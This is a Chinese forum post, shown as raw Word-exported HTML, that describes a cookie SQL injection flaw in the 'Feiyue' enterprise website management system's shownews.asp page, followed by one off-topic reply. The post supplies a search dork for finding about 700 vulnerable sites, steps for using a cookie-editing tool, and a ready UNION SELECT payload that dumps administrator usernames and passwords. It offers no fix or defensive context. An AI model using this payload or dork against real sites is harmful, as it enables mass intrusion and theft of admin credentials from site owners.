飞越企业网站管理系统cookie注入漏洞
<P class=MsoNormal style="MARGIN: 0cm 0cm 0pt"><FONT size=3><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">注入页面:</SPAN><SPAN lang=EN-US><A href="http://localhost/fyqy/shownews.asp" target=_blank><FONT face="Times New Roman" color=#800080>http://localhost/fyqy/shownews.asp</FONT></A><FONT face="Times New Roman"> </FONT></SPAN></FONT></P><P class=MsoNormal style="MARGIN: 0cm 0cm 0pt"><FONT size=3><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">搜索关键词:</SPAN><SPAN lang=EN-US><FONT face="Times New Roman">"inurl:Imagebig_honor.asp" 有洞站达700个</FONT></SPAN></FONT></P>
<P class=MsoNormal style="MARGIN: 0cm 0cm 0pt"><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'"><FONT size=3>利用方法:</FONT></SPAN></P>
<P class=MsoNormal style="MARGIN: 0cm 0cm 0pt"><SPAN lang=EN-US><FONT size=3><FONT face="Times New Roman"> <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><o:p></o:p></FONT></FONT></SPAN></P>
<P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left" align=left><FONT size=3><SPAN lang=EN-US><FONT face="Times New Roman">1</FONT></SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">、利用职桂林老兵</SPAN><SPAN lang=EN-US><FONT face="Times New Roman">cook</FONT></SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">修改工具,在地址栏写入:</SPAN><SPAN lang=EN-US><A href="http://localhost/fyqy/shownews.asp" target=_blank><FONT face="Times New Roman" color=#800080>http://localhost/fyqy/shownews.asp</FONT></A></SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">,点连接(</SPAN><SPAN lang=EN-US><FONT face="Times New Roman">localhost,</FONT></SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">换为相应的网址)</SPAN></FONT></P>
<P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left" align=left><FONT size=3><SPAN lang=EN-US><FONT face="Times New Roman">2</FONT></SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">、点小金锁,在</SPAN><SPAN lang=EN-US><FONT face="Times New Roman">cookie</FONT></SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">栏写入注入语句:</SPAN><SPAN lang=EN-US style="COLOR: red"><FONT face="Times New Roman">id=39+and+1+like+1+union+select+1,username,password,4,5,6,7,8,9,10,11+from+admin (id=后面的39,是新闻的ID值,可以打开页面找,如果是不存在的值,则可能会出现数据连接错误的提示,请查看自行修改吧!)<o:p></o:p></FONT></SPAN></FONT></P>
<P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; TEXT-ALIGN: left" align=left><FONT size=3><SPAN lang=EN-US style="COLOR: red"><FONT face="Times New Roman">3</FONT></SPAN><SPAN style="COLOR: red; FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">、点两次刷新,成功爆出密码</SPAN></FONT></P>
re:飞越企业网站管理系统cookie注入漏洞
<P>你是不是有上面的一种还是好几种禁忌了???</P><P>哈哈哈哈.</P>
页:
[1]